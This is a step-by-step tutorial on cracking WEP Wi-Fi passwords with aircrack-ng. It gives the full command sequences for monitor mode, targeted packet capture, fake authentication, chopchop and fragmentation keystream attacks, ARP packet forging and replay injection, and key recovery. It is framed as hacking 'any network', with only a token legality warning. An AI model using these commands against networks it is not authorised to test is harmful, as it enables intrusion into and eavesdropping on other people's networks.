Dateiliste

aircrack-ng is tool that can recover WEP key after enough packets have been captured, to recover 64 bit key (5 letters) you need around 15 000 packets, and to recover 128bit key (13 letters) around 80 000 packets.

First of all, this tutorial is NOT for Windows, because Windows drivers won't let you capture foreign packets or send packets with custom content , so if you are using Windows, get Backtrack 5 linux live DVD (it has aircrack already installed with many wlan drivers) or if you already have linux, get aircrack-ng from here and install it. Also, hacking wireless networks is illegal, so use this only against your home network!

http://www.aircrack-ng.org/index.html

If you need that Backtrack live DVD, get it from here:

http://www.backtrack-linux.org/

Now, when you have linux up and running, follow these steps to hack any network with WEP encryption:

1. Set your wlan adapter into monitor mode

Monitor mode is required if you want to capture wifi traffic.

To do this you can use tool called airmon-ng:

command "airmon-ng" lists available wlan adapters:

My wlan adapter is called "wlan0".

Now, to set it into monitor mode, write "airmon-ng start wlan0"

It should say that monitor mode was enabled on mon0.

now you can use mon0 to capture wifi packets using airodump-ng

2. Find BSSID and channel of your target network

write "airodump-ng mon0" to start capturing packets, it should output something like this:

Telecom (my network) is running on channel 6 (you can see it under "CH") and has BSSID 00:50:7F:BE:CE:60

Number of packets you have captured will be displayed under "#Data"

When someone is connected and is downloading something, it will increase pretty fast :)

now you have to target airodump-ng on your target network

airodump-ng --bssid BSSID --channel CHANNEL -w cap mon0

--bssid specifies BSSID of your target network, --channel specifies it's channel and -w specifies output file

it will create 4 files, we need only one, "cap-01.cap"

if cap-01.cap was already in your current folder, it will be called "cap-02.cap" and so on.

don't forget -w , it is annoying when you have captured 100 000 packets and then you will find out that no output file has been specified.

3. run aircrack-ng against file with captured packets

my file was called cap-01.cap, so my command was:

aircrack-ng cap-01.cap

This is how successful attack looks like:

i had around 81 000 captured packets, enough for 128bit password

This was very basic attack against wireless network, it works good when someone is currently connected to that network and is downloading huge files. When no-one is connected to that network or network's owner is not downloading huge file, you can use "packet injection" to speed things up.

To do this, you have to obtain keystream ,use it to generate ARP packet and then send it repeatedly to target network.

4. Obtain keystream

There are 2 possible attack's to get network's keystream. Keystream is needed to generate valid ARP packet. These attack's won't work if you are not associated by that network, to get associated you can use aireplay-ng to send fake-auth requests:

aireplay-ng -1 6000 -q 10 -o 1 -a BSSID mon0

-1 6000 means that it will resend auth request every 6000 seconds, -q 10 means that it will send keep alive packet every 10 seconds and -o 1 means that it will send only 1 request at the same time. mon0 is your adapter in monitor-mode

This will only work if network is using open authentication

now you can use chopchop or fragmentation attack to obtain keystream

4a: Use "chopchop" attack to get keystream:

aireplay-ng --chopchop -a BSSID mon0

now it will wait for a single packet, it will take a little logner if no one is connected, but most networks will sooner or later send some packet even when no one is connected (at least my network is doing it - i dont know why)

After that packet will be captured, it will ask you "use this packet?" - answer "y" :D

now, it will be guessing bytes of keystream, if you want to learn more about chopchop, see this link

http://www.aircrack-ng.org/doku.php?id=chopchoptheory

after it finished, you will see that it saved keystream into a file with .xor extension:

my keystream is called replay_dec-0829-132410.xor

now i can use it to generate packet with packetforge-ng (step 5)

4b - use fragmentation attack to obtain keystream. 

aireplay-ng --fragment -b BSSID mon0

here is how a successful fragmentation attack looks like:

it will ask you "use this packet?" after packet has been captured, but you must have good signal, if you have bad signal, you will see "not enough acks" messages and all you can do is to try chopchop attack :D

If you want to find out more about fragmentation attack, read this PDF file:

http://download.aircrack-ng.org/wiki-files/doc/Fragmentation-Attack-in-Practice.pdf

5. Use packetforge to generate ARP packet

packetforge-ng -0 -a ACCESS_POINT'S_MAC -h YOUR_MAC -k 255.255.255.0 -l 255.255.255.0   -y keystream.xor -w arp

-0 means that it will generate ARP packet, -a is AP's mac -h is your mac -k and -l are IP adresses of sender and receiver, -y is file with keystream and -w is output file.

if everything worked good, it should write this message:

"wrote packet to arp"

now you can use aireplay-ng to repeatedly send this packet to your target network and generate necessary traffic.

6. - sending your arp packet to your target network

aireplay-ng -2 -r arp mon0

-2 means "interactive packet replay", -r arp means that it will read packet from file "arp" and mon0 is your wlan adapter in monitor mode.

now check your terminal where airodump-ng is running, #Data should rapidly increase :)

after you have enough packets, use aircrack-ng to recover password (step 3)